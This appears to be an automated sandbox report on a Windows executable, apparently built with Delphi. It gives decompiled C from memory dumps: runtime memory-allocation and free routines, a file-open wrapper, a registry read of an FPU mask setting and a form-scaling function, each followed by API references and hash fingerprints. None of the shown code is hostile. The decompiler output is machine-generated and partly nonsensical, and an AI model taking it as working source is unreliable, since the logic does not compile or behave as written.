- 0xb30; _t142 = _t141 >> 0xd; _t131 = _t141 >> 8; _t104 = 0xffffffff << _t131 & *(0x463728 + _t142 * 4); __eflags = 0xffffffff; if(0xffffffff == 0) { _t132 = _t142; __eflags = 0xfffffffe << _t132 & *0x463724; if((0xfffffffe << _t132 & *0x463724) == 0) { _t133 = *0x463720; // 0x3a290 _t134 = _t133 - _t125; __eflags = _t134; if(_t134 < 0) { _t109 = E004016C8(_t125); } else { _t110 = *0x46371c; // 0x26fa2a0 _t109 = _t110 - _t125; *0x46371c = _t109; *0x463720 = _t134; *(_t109 - 4) = _t125 | 0x00000002; } *0x463718 = 0; return _t109; } else { asm("bsf edx, eax"); asm("bsf ecx, eax"); _t135 = _t132 | _t142 << 0x00000005; goto L47; } } else { asm("bsf eax, eax"); _t135 = _t131 & 0xffffffe0 | _t104; L47: _push(_t152); _push(_t145); _t148 = 0x4637a8 + _t135 * 8; _t159 = *((intOrPtr*)(_t148 + 4)); _t114 = *((intOrPtr*)(_t159 + 4)); *((intOrPtr*)(_t148 + 4)) = _t114; *_t114 = _t148; __eflags = _t148 - _t114; if(_t148 == _t114) { asm("rol eax, cl"); _t80 = 0x463728 + _t142 * 4; *_t80 = *(0x463728 + _t142 * 4) & 0xfffffffe; __eflags = *_t80; if( *_t80 == 0) { asm("btr [0x463724], edx"); } } _t150 = 0xfffffff0 & *(_t159 - 4); _t144 = 0xfffffff0 - _t125; __eflags = 0xfffffff0; if(0xfffffff0 == 0) { _t89 = &((_t159 - 4)[0xfffffffffffffffc]); *_t89 = *(_t159 - 4 + _t150) & 0x000000f7; __eflags = *_t89; } else { _t116 = _t125 + _t159; *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3; *(0xfffffff0 + _t116 - 8) = 0xfffffff0; __eflags = 0xfffffff0 - 0xb30; if(0xfffffff0 >= 0xb30) { E004015FC(_t116, 0xfffffffffffffff3, _t144); } } *(_t159 - 4) = _t125 + 2; *0x463718 = 0; return _t159; } } } else { __eflags = __cl; __eax = *(__edx + 0x4635c0) & 0x000000ff; __ebx = 0x46103c + ( *(__edx + 0x4635c0) & 0x000000ff) * 8; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags == 0) { goto L5; } __ebx = __ebx + 0x20; __eflags = __ebx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__ebx != 0) { __ebx = __ebx + 0x20; __eflags = __ebx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__ebx != 0) { __ebx = __ebx - 0x40; __eflags = __ebx; Sleep(0); __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags != 0) { Sleep(0xa); continue; } } } goto L5; } } L5: __edx = *(__ebx + 4); __eax = *(__edx + 8); __ecx = 0xfffffff8; __eflags = __edx - __ebx; if(__edx == __ebx) { __edx = *(__ebx + 0x10); __ecx = *(__ebx + 2) & 0x0000ffff; __ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax; __eflags = __eax - *(__ebx + 0xc); if(__eax > *(__ebx + 0xc)) { _push(__esi); _push(__edi); __eflags = *0x46304d; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { goto L20; } Sleep(0); __eax = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L20; } } L20: *(__ebx + 1) = *(__ebx + 1) & *0x463724; __eflags = *(__ebx + 1) & *0x463724; if(( *(__ebx + 1) & *0x463724) == 0) { __ecx = *(__ebx + 0x18) & 0x0000ffff; __edi = *0x463720; // 0x3a290 __eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff); if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) { __eax = *(__ebx + 0x1a) & 0x0000ffff; __edi = __eax; __eax = E004016C8(__eax); __esi = __eax; __eflags = __eax; if(__eax != 0) { goto L33; } else { *0x463718 = __al; *__ebx = __al; _pop(__edi); _pop(__esi); _pop(__ebx); return __eax; } } else { __esi = *0x46371c; // 0x26fa2a0 __ecx = *(__ebx + 0x1a) & 0x0000ffff; __edx = __ecx + 0xb30; __eflags = __edi - __ecx + 0xb30; if(__edi >= __ecx + 0xb30) { __edi = __ecx; } __esi = __esi - __edi; *0x463720 = *0x463720 - __edi; *0x46371c = __esi; goto L33; } } else { asm("bsf eax, esi"); __esi = __eax * 8; __ecx = *(0x463728 + __eax * 4); asm("bsf ecx, ecx"); __ecx = *(0x463728 + __eax * 4) + __eax * 8 * 4; __edi = 0x4637a8 + ( *(0x463728 + __eax * 4) + __eax * 8 * 4) * 8; __esi = *(__edi + 4); __edx = *(__esi + 4); *(__edi + 4) = __edx; *__edx = __edi; __eflags = __edi - __edx; if(__edi == __edx) { __edx = 0xfffffffe; asm("rol edx, cl"); _t38 = 0x463728 + __eax * 4; *_t38 = *(0x463728 + __eax * 4) & 0xfffffffe; __eflags = *_t38; if( *_t38 == 0) { asm("btr [0x463724], eax"); } } __edi = 0xfffffff0; __edi = 0xfffffff0 & *(__esi - 4); __eflags = 0xfffffff0 - 0x10a60; if(0xfffffff0 < 0x10a60) { _t52 = &((__esi - 4)[0xfffffffffffffffc]); *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7; __eflags = *_t52; } else { __edx = __edi; __edi = *(__ebx + 0x1a) & 0x0000ffff; __edx = __edx - __edi; __eax = __edi + __esi; __ecx = __edx + 3; *(__eax - 4) = __ecx; *(__edx + __eax - 8) = __edx; __eax = E004015FC(__eax, __ecx, __edx); } L33: _t56 = __edi + 6; // 0x3a296 __ecx = _t56; *(__esi - 4) = _t56; __eax = 0; *0x463718 = __al; *__esi = __ebx; *((intOrPtr*)(__esi + 8)) = 0; *((intOrPtr*)(__esi + 0xc)) = 1; *(__ebx + 0x10) = __esi; _t61 = __esi + 0x20; // 0x26fa2c0 __eax = _t61; __ecx = *(__ebx + 2) & 0x0000ffff; __edx = __ecx + __eax; *(__ebx + 8) = __ecx + __eax; __edi = __edi + __esi; __edi = __edi - __ecx; __eflags = __edi; *(__ebx + 0xc) = __edi; *__ebx = 0; *(__eax - 4) = __esi; _pop(__edi); _pop(__esi); _pop(__ebx); return __eax; } } else { _t19 = __edx + 0xc; *_t19 = *(__edx + 0xc) + 1; __eflags = *_t19; *(__ebx + 8) = __ecx; *__ebx = 0; *(__eax - 4) = __edx; _pop(__ebx); return __eax; } } else { *(__edx + 0xc) = *(__edx + 0xc) + 1; __ecx = 0xfffffff8 & *(__eax - 4); __eflags = 0xfffffff8; *(__edx + 8) = 0xfffffff8 & *(__eax - 4); *(__eax - 4) = __edx; if(0xfffffff8 == 0) { __ecx = *(__edx + 4); *(__ecx + 0x14) = __ebx; *(__ebx + 4) = __ecx; *__ebx = 0; _pop(__ebx); return __eax; } else { *__ebx = 0; _pop(__ebx); return __eax; } } } } 0x0040182c 0x00401832 0x00401a64 0x00401a69 0x00401b7c 0x00401b7d 0x00401b7f 0x00401780 0x00401784 0x00401790 0x004017a5 0x004017a9 0x004017ab 0x004017ad 0x004017b3 0x004017b6 0x004017bb 0x004017c0 0x004017c6 0x004017cc 0x004017cf 0x004017d1 0x004017d8 0x004017d8 0x004017e1 0x00401b85 0x00401b85 0x00401b87 0x00401b87 0x00401a6f 0x00401a7b 0x00401a7e 0x00401a80 0x00401a34 0x00401a39 0x00401a41 0x00000000 0x00000000 0x00401a45 0x00401a4f 0x00401a57 0x00401a5b 0x00000000 0x00401a5b 0x00000000 0x00401a57 0x00401a34 0x00401a82 0x00401a82 0x00401a8a 0x00401a8d 0x00401a97 0x00401a97 0x00401a9e 0x00401ab1 0x00401ab5 0x00401abb 0x00401ad4 0x00401ada 0x00401ada 0x00401adc 0x00401afa 0x00401ade 0x00401ade 0x00401ae3 0x00401ae5 0x00401aea 0x00401af3 0x00401af3 0x00401aff 0x00401b07 0x00401abd 0x00401abd 0x00401ac7 0x00401acf 0x00000000 0x00401acf 0x00401aa0 0x00401aa3 0x00401aa6 0x00401b08 0x00401b08 0x00401b09 0x00401b0a 0x00401b11 0x00401b14 0x00401b17 0x00401b1a 0x00401b1c 0x00401b1e 0x00401b25 0x00401b27 0x00401b27 0x00401b27 0x00401b2e 0x00401b30 0x00401b30 0x00401b2e 0x00401b3c 0x00401b41 0x00401b41 0x00401b43 0x00401b64 0x00401b64 0x00401b64 0x00401b45 0x00401b45 0x00401b4b 0x00401b4e 0x00401b52 0x00401b58 0x00401b5a 0x00401b5a 0x00401b58 0x00401b6c 0x00401b6f 0x00401b7b 0x00401b7b 0x00401a9e 0x00401838 0x00401838 0x0040183a 0x00401841 0x00401848 0x004018a0 0x004018a0 0x004018a5 0x004018a9 0x00000000 0x00000000 0x004018ab 0x004018ab 0x004018ae 0x004018b3 0x004018b7 0x004018b9 0x004018b9 0x004018bc 0x004018c1 0x004018c5 0x004018c7 0x004018c7 0x004018cc 0x004018d1 0x004018d6 0x004018da 0x004018e2 0x00000000 0x004018e2 0x004018da 0x004018c5 0x00000000 0x004018b7 0x004018a0 0x0040184a 0x0040184a 0x0040184d 0x00401850 0x00401855 0x00401857 0x00401870 0x00401873 0x00401877 0x00401879 0x0040187c 0x004018ec 0x004018ed 0x004018ee 0x004018f5 0x004018f7 0x004018f7 0x004018fc 0x00401904 0x00000000 0x00000000 0x00401908 0x0040190d 0x00401912 0x0040191a 0x0040191e 0x00000000 0x0040191e 0x00000000 0x0040191a 0x004018f7 0x00401928 0x0040192c 0x0040192c 0x00401932 0x004019a4 0x004019a8 0x004019ae 0x004019b0 0x004019d8 0x004019dc 0x004019de 0x004019e3 0x004019e5 0x004019e7 0x00000000 0x004019e9 0x004019e9 0x004019ee 0x004019f0 0x004019f1 0x004019f2 0x004019f3 0x004019f3 0x004019b2 0x004019b2 0x004019b8 0x004019bc 0x004019c2 0x004019c4 0x004019c6 0x004019c6 0x004019c8 0x004019ca 0x004019d0 0x00000000 0x004019d0 0x00401934 0x00401934 0x00401937 0x0040193e 0x00401945 0x00401948 0x0040194b 0x00401952 0x00401955 0x00401958 0x0040195b 0x0040195d 0x0040195f 0x00401961 0x00401966 0x00401968 0x00401968 0x00401968 0x0040196f 0x00401971 0x00401971 0x0040196f 0x00401978 0x0040197d 0x00401980 0x00401986 0x004019f4 0x004019f4 0x004019f4 0x00401988 0x00401988 0x0040198a 0x0040198e 0x00401990 0x00401993 0x00401996 0x00401999 0x0040199d 0x0040199d 0x004019f9 0x004019f9 0x004019f9 0x004019fc 0x004019ff 0x00401a01 0x00401a06 0x00401a08 0x00401a0b 0x00401a12 0x00401a15 0x00401a15 0x00401a18 0x00401a1c 0x00401a1f 0x00401a22 0x00401a24 0x00401a24 0x00401a26 0x00401a29 0x00401a2c 0x00401a2f 0x00401a30 0x00401a31 0x00401a32 0x00401a32 0x0040187e 0x0040187e 0x0040187e 0x0040187e 0x00401882 0x00401885 0x00401888 0x0040188b 0x0040188c 0x0040188c 0x00401859 0x00401859 0x0040185d 0x0040185d 0x00401860 0x00401863 0x00401866 0x00401890 0x00401893 0x00401896 0x00401899 0x0040189c 0x0040189d 0x00401868 0x00401868 0x0040186b 0x0040186c 0x0040186c 0x00401866 0x00401857

APIs

Sleep.KERNEL32(00000000,?,004020BD), ref: 004018CC Sleep.KERNEL32(0000000A,00000000,?,004020BD), ref: 004018E2

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep String ID: API String ID: 3472027048-0 Opcode ID: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2 Instruction ID: 152e54be863095814fc9e312b9aeabec1b522ad23c6b77915a881c1f34c1aab1 Opcode Fuzzy Hash: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2 Instruction Fuzzy Hash: 4DB139F26012919FC715CF29D880316BBE0EB85312F18C27FE4459B3E5E7B89A41CB99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E0041CB80(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) { char _v5; char _v12; char _v16; char _v20; char _v24; char _v28; char _v32; char _v36; char _v40; void* _t29; void* _t65; void* _t66; intOrPtr _t70; intOrPtr _t72; char _t73; intOrPtr _t77; void* _t89; void* _t91; void* _t92; intOrPtr _t93; _t73 = __edx; _t66 = __ecx; _t91 = _t92; _t93 = _t92 + 0xffffffdc; _v36 = 0; _v40 = 0; _v28 = 0; _v32 = 0; if(__edx != 0) { _t93 = _t93 + 0xfffffff0; _t29 = E00403C34(_t29, _t91); } _t89 = _t66; _v5 = _t73; _t65 = _t29; _t87 = _a8; _push(_t91); _push(0x41ccc8); _push( *[fs:eax]); *[fs:eax] = _t93; if(_a8 != 0xffff) { E0041CA78(E00408D98(_t89, _t87 & 0x0000ffff), 0); if( *((intOrPtr*)(_t65 + 4)) < 0) { E00408F58(_t89, &_v36); _v24 = _v36; _v20 = 0xb; E0040B908(GetLastError(), &_v40); _v16 = _v40; _v12 = 0xb; _t70 = *0x462ac0; // 0x416140 E0040C214(_t65, _t70, 1, _t87, _t89, 1, &_v24); E00404184(); } } else { E0041CA78(CreateFileA(E00404C00(_t89), 0xc0000000, 0, 0, "true", 0x80, 0), 0); if( *((intOrPtr*)(_t65 + 4)) < 0) { E00408F58(_t89, &_v28); _v24 = _v28; _v20 = 0xb; E0040B908(GetLastError(), &_v32); _v16 = _v32; _v12 = 0xb; _t72 = *0x462f34; // 0x416138 E0040C214(_t65, _t72, 1, _t87, _t89, 1, &_v24); E00404184(); } } _t27 = _t65 + 8; // 0x418ad8 E00404790(_t27, _t89); _pop(_t77); *[fs:eax] = _t77; _push(E0041CCCF); return E00404760( &_v40, 4); } 0x0041cb80 0x0041cb80 0x0041cb81 0x0041cb83 0x0041cb8b 0x0041cb8e 0x0041cb91 0x0041cb94 0x0041cb99 0x0041cb9b 0x0041cb9e 0x0041cb9e 0x0041cba3 0x0041cba5 0x0041cba8 0x0041cbaa 0x0041cbaf 0x0041cbb0 0x0041cbb5 0x0041cbb8 0x0041cbc0 0x0041cc50 0x0041cc59 0x0041cc60 0x0041cc68 0x0041cc6b 0x0041cc77 0x0041cc7f 0x0041cc82 0x0041cc8c 0x0041cc99 0x0041cc9e 0x0041cc9e 0x0041cbc2 0x0041cbe7 0x0041cbf0 0x0041cbfb 0x0041cc03 0x0041cc06 0x0041cc12 0x0041cc1a 0x0041cc1d 0x0041cc27 0x0041cc34 0x0041cc39 0x0041cc39 0x0041cbf0 0x0041cca3 0x0041cca8 0x0041ccaf 0x0041ccb2 0x0041ccb5 0x0041ccc7

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CBDC GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC0A Part of subcall function 00408D98: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00418AD0,0041CC4A,00000000,0041CCC8,?,?,00418AD0), ref: 00408DE6 Part of subcall function 00408F58: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00418AD0,0041CC65,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 00408F77 GetLastError.KERNEL32(00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC6F Part of subcall function 0040B908: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000), ref: 0040B927

Strings

8aA , xrefs: 0041CC27 @aA , xrefs: 0041CC8C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath String ID: 8aA$@aA API String ID: 503785936-2183923460 Opcode ID: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb Instruction ID: 81cf5405ad412fc3c3ed94fa8eb2254e93a3cb41c3525e5490fe9ad35a09f5bb Opcode Fuzzy Hash: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb Instruction Fuzzy Hash: 4B31D670A002089FDB00EBA5CD827DEBBF5AB49304F50807EE504B73C1D7799D048BA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E00403728() { void* _v8; char _v12; int _v16; signed short _t14; intOrPtr _t27; void* _t29; void* _t31; intOrPtr _t32; _t29 = _t31; _t32 = _t31 + 0xfffffff4; _v12 = *0x461020 & 0x0000ffff; if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1, &_v8) != 0) { _t14 = *0x461020 & 0xffc0 | _v12 & 0x3f; *0x461020 = _t14; return _t14; } else { _push(_t29); _push(E00403799); _push( *[fs:eax]); *[fs:eax] = _t32; _v16 = 4; RegQueryValueExA(_v8, "FPUMaskValue", 0, 0, &_v12, &_v16); _pop(_t27); *[fs:eax] = _t27; _push(0x4037a0); return RegCloseKey(_v8); } } 0x00403729 0x0040372b 0x00403735 0x00403751 0x004037b3 0x004037b6 0x004037bf 0x00403753 0x00403755 0x00403756 0x0040375b 0x0040375e 0x00403761 0x0040377d 0x00403784 0x00403787 0x0040378a 0x00403798 0x00403798

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040374A RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040377D RegCloseKey.ADVAPI32(?,004037A0,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403793

Strings

FPUMaskValue , xrefs: 00403774 SOFTWARE\Borland\Delphi\RTL , xrefs: 00403740

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL API String ID: 3677997916-4173385793 Opcode ID: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e Instruction ID: 905e6c10af62dac64c3e9582eb7401ad952ea0fe5c189a7c1f175b7203d1f33b Opcode Fuzzy Hash: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e Instruction Fuzzy Hash: C701B5B9914348BAEB11DF918C42BB977BCEB48B01F104477F904F79D0E6789A10C65D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%

E0044E9D8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr* _v8; int _t103; int _t105; intOrPtr _t122; int _t127; intOrPtr _t163; signed char _t172; void* _t174; intOrPtr _t192; intOrPtr _t205; void* _t208; void* _t210; int _t211; intOrPtr _t215; void* _t217; signed char _t218; _t208 = __edi; _t214 = _t215; _t210 = __edx; _v8 = __eax; E0043E310(_v8); _push(_t215); _push(0x44ec56); _push( *[fs:edx]); *[fs:edx] = _t215; *(_v8 + 0x2b0) = 0; *(_v8 + 0x2b4) = 0; *(_v8 + 0x2b8) = 0; _t174 = 0; _t217 = E004038B4( *_v8) - *0x44b604; // 0x44b650 if(_t217 == 0) { _t172 = *0x4657f5 & 0x000000ff ^ 0x00000001; _t218 = _t172; *(_v8 + 0x27c) = _t172; } E0043D938(_v8, _t174, _t210, _t218); if( *(_v8 + 0x2a4) == 0 || *(_v8 + 0x2b8) <= 0) { L14: _t103 = *(_v8 + 0x2b0); _t227 = _t103; if(_t103 > 0) { E0043A3B0(_v8, _t103, _t227); } _t105 = *(_v8 + 0x2b4); _t228 = _t105; if(_t105 > 0) { E0043A3F4(_v8, _t105, _t228); } *(_v8 + 0x8c) = *0x44ec64 & 0x000000ff; _t229 = _t174; if(_t174 == 0) { E0044DFB0(_v8, 1, 1); E00441EB0(_v8, 1, 1, _t229); } E0043BC9C(_v8, 0, 0xb03d, 0); _pop(_t192); *[fs:eax] = _t192; _push(0x44ec5d); return E0043E318(_v8); } else { if(( *(_v8 + 0x8c) & 0x00000010) != 0) { _t205 = *0x466584; // 0x27c66a0 if( *(_v8 + 0x2a4) != *((intOrPtr*)(_t205 + 0x40))) { _t163 = *0x466584; // 0x27c66a0 E00425B74( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00425B6C( *((intOrPtr*)(_v8 + 0x68))), *(_t163 + 0x40), *(_v8 + 0x2a4)), _t208, _t214); } } _t122 = *0x466584; // 0x27c66a0 *(_v8 + 0x2a4) = *(_t122 + 0x40); _t211 = E0044EDC4(_v8); _t127 = *(_v8 + 0x2b8); _t223 = _t211 - _t127; if(_t211 != _t127) { _t174 = 1; E0044DFB0(_v8, _t127, _t211); E0043A4D8(_v8, *(_v8 + 0x2b8), _t211); E00441EB0(_v8, *(_v8 + 0x2b8), _t211, _t223); if(( *(_v8 + 0x8c) & 0x00000004) != 0) { *(_v8 + 0x2b0) = MulDiv( *(_v8 + 0x2b0), _t211, *(_v8 + 0x2b8)); } if(( *(_v8 + 0x8c) & 0x00000008) != 0) { *(_v8 + 0x2b4) = MulDiv( *(_v8 + 0x2b4), _t211, *(_v8 + 0x2b8)); } if(( *(_v8 + 0x8c) & 0x00000020) != 0) { *(_v8 + 0x242) = MulDiv( *(_v8 + 0x242), _t211, *(_v8 + 0x2b8)); *(_v8 + 0x246) = MulDiv( *(_v8 + 0x246), _t211, *(_v8 + 0x2b8)); } } goto L14; } } 0x0044e9d8 0x0044e9d9 0x0044e9de 0x0044e9e0 0x0044e9e6 0x0044e9ed 0x0044e9ee 0x0044e9f3 0x0044e9f6 0x0044e9fe 0x0044ea09 0x0044ea14 0x0044ea1a 0x0044ea26 0x0044ea2c 0x0044ea35 0x0044ea35 0x0044ea3a 0x0044ea3a 0x0044ea45 0x0044ea54 0x0044ebc9 0x0044ebcc 0x0044ebd2 0x0044ebd4 0x0044ebdb 0x0044ebdb 0x0044ebe3 0x0044ebe9 0x0044ebeb 0x0044ebf2 0x0044ebf2 0x0044ec01 0x0044ec07 0x0044ec09 0x0044ec18 0x0044ec2a 0x0044ec2a 0x0044ec3b 0x0044ec42 0x0044ec45 0x0044ec48 0x0044ec55 0x0044ea6a 0x0044ea74 0x0044ea7f 0x0044ea88 0x0044ea94 0x0044eab4 0x0044eab4 0x0044ea88 0x0044eab9 0x0044eac4 0x0044ead2 0x0044ead7 0x0044eadd 0x0044eadf 0x0044eae5 0x0044eaee 0x0044eb01 0x0044eb14 0x0044eb23 0x0044eb42 0x0044eb42 0x0044eb52 0x0044eb71 0x0044eb71 0x0044eb81 0x0044eba0 0x0044ebc3 0x0044ebc3 0x0044eb81 0x00000000 0x0044eadf

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044EAAB MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB3A MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB69 MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB98 MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EBBB

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84 Instruction ID: 21f30903740b1ce47e0213c7038e8d86d6add3c7edb827e050f75d84db499a4c Opcode Fuzzy Hash: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84 Instruction Fuzzy Hash: 7081B574A00154EFDB40DB9AC589E9EB7F9BF49304F2541FAA808DB362CB74AE409B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E00401B88(void* __eax, void* __edi) { signed int __ebx; void* _t50; signed int _t51; signed int _t52; signed int _t54; void _t57; int _t58; signed int _t65; void* _t67; signed int _t69; intOrPtr _t70; signed int _t75; signed int _t76; signed int _t77; void* _t79; void* _t82; void _t85; void* _t87; void* _t89; _t48 = __eax; _t77 = *(__eax - 4); _t65 = *0x46304d; // 0x0 if((_t77 & 0x00000007) != 0) { __eflags = _t77 & 0x00000005; if((_t77 & 0x00000005) != 0) { _pop(_t65); __eflags = _t77 & 0x00000003; if((_t77 & 0x00000003) != 0) { return 0xffffffff; } else { _push(_t65); _t67 = __eax - 0x10; E00401740(); _t50 = _t67; _t85 = *_t50; _t82 = *(_t50 + 4); _t51 = VirtualFree(_t67, 0, 0x8000); if(_t51 == 0) { _t52 = _t51 | 0xffffffff; __eflags = _t52; } else { *_t82 = _t85; *(_t85 + 4) = _t82; _t52 = 0; } *0x4657a8 = 0; return _t52; } } else { goto L21; } } else { __eflags = __bl; __ebx = *__edx; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags == 0) { goto L6; } Sleep(0); __edx = __edx; __ecx = __ecx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags != 0) { Sleep(0xa); __edx = __edx; __ecx = __ecx; continue; } goto L6; } } L6: _t6 = __edx + 0xc; *_t6 = *(__edx + 0xc) - 1; __eflags = *_t6; __eax = *(__edx + 8); if( *_t6 == 0) { __eflags = __eax; if(__eax == 0) { L12: *(__ebx + 0xc) = __eax; } else { __eax = *(__edx + 0x14); __ecx = *(__edx + 4); *(__eax + 4) = __ecx; *(__ecx + 0x14) = __eax; __eax = 0; __eflags = *((intOrPtr*)(__ebx + 0x10)) - __edx; if( *((intOrPtr*)(__ebx + 0x10)) == __edx) { goto L12; } } *__ebx = __al; __eax = __edx; __edx = *(__edx - 4); __bl = *0x46304d; // 0x0 L21: __eflags = _t65; _t69 = _t77 & 0xfffffff0; _push(_t84); _t87 = _t48; if(__eflags != 0) { while(1) { _t54 = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { goto L22; } Sleep(0); _t54 = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L22; } } L22: __eflags = (_t87 - 4)[_t69] & 0x00000001; _t75 = (_t87 - 4)[_t69]; if(((_t87 - 4)[_t69] & 0x00000001) != 0) { _t54 = _t69 + _t87; _t76 = _t75 & 0xfffffff0; _t69 = _t69 + _t76; __eflags = _t76 - 0xb30; if(_t76 >= 0xb30) { _t54 = E004015BC(_t54); } } else { _t76 = _t75 | 0x00000008; __eflags = _t76; (_t87 - 4)[_t69] = _t76; } __eflags = *(_t87 - 4) & 0x00000008; if(( *(_t87 - 4) & 0x00000008) != 0) { _t76 = *(_t87 - 8); _t87 = _t87 - _t76; _t69 = _t69 + _t76; __eflags = _t76 - 0xb30; if(_t76 >= 0xb30) { _t54 = E004015BC(_t87); } } __eflags = _t69 - 0x13fff0; if(_t69 == 0x13fff0) { __eflags = *0x463720 - 0x13fff0; if( *0x463720 != 0x13fff0) { _t70 = _t87 + 0x13fff0; E0040165C(_t54); *((intOrPtr*)(_t70 - 4)) = 2; *0x463720 = 0x13fff0; *0x46371c = _t70; *0x463718 = 0; __eflags = 0; return 0; } else { _t89 = _t87 - 0x10; _t57 = *_t89; _t79 = *(_t89 + 4); *(_t57 + 4) = _t79; *_t79 = _t57; *0x463718 = 0; _t58 = VirtualFree(_t89, 0, 0x8000); __eflags = _t58 - 1; asm("sbb eax, eax"); return _t58; } } else { *(_t87 - 4) = _t69 + 3; *(_t87 - 8 + _t69) = _t69; E004015FC(_t87, _t76, _t69); *0x463718 = 0; __eflags = 0; return 0; } } else { __eflags = __eax; *(__edx + 8) = __ecx; *(__ecx - 4) = __eax; if(__eflags == 0) { __ecx = *(__ebx + 4); *(__edx + 0x14) = __ebx; *(__edx + 4) = __ecx; *(__ecx + 0x14) = __edx; *(__ebx + 4) = __edx; *__ebx = 0; __eax = 0; __eflags = 0; _pop(__ebx); return 0; } else { __eax = 0; __eflags = 0; *__ebx = __al; _pop(__ebx); return 0; } } } } 0x00401b88 0x00401b88 0x00401b91 0x00401b97 0x00401c68 0x00401c6b 0x00401d58 0x00401d59 0x00401d5c 0x00401d67 0x004017e4 0x004017e4 0x004017e9 0x004017ec 0x004017f1 0x004017f3 0x004017f5 0x00401800 0x00401807 0x00401812 0x00401812 0x00401809 0x00401809 0x0040180b 0x0040180e 0x0040180e 0x00401815 0x0040181f 0x0040181f 